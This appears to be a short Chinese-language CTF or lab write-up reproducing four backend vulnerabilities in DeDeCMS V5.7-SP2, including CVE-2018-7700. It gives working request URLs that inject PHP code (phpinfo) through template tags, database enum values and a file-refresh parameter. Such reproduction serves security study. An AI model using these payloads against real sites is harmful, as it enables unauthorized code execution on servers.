前言

复现CMS:DeDeCMS

复现版本:V5.7-SP2

漏洞点1 模块->文件管理器

DeDeCMS的文件管理器功能,支持文件上传

上传一个info.php

成功获取FLAG

漏洞点2 广告管理

添加后,查看调用代码

访问JS代码中给出的路径

那么如果是输出FLAG呢?

漏洞点3 后台任意代码执行 CVE-2018-7700

1
/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}

漏洞点4 sys_cache_up.php后台文件写入

漏洞代码在/dede/sys_cache_up.php文件 36行处,由于可以操作文件内容,且文件内容是从数据库取值的,因此通过在数据库里写入内容,通过查询数据库将文件写入服务器。

使用下面请求将代码写入数据库:

1
/dede/stepselect_main.php?action=addenum_save&ename=123&egroup=;phpinfo();$&issign=1

访问:/dede/sys_verifies.php?action=getfiles&refiles[]=123&refiles[]=\";phpinfo();die();//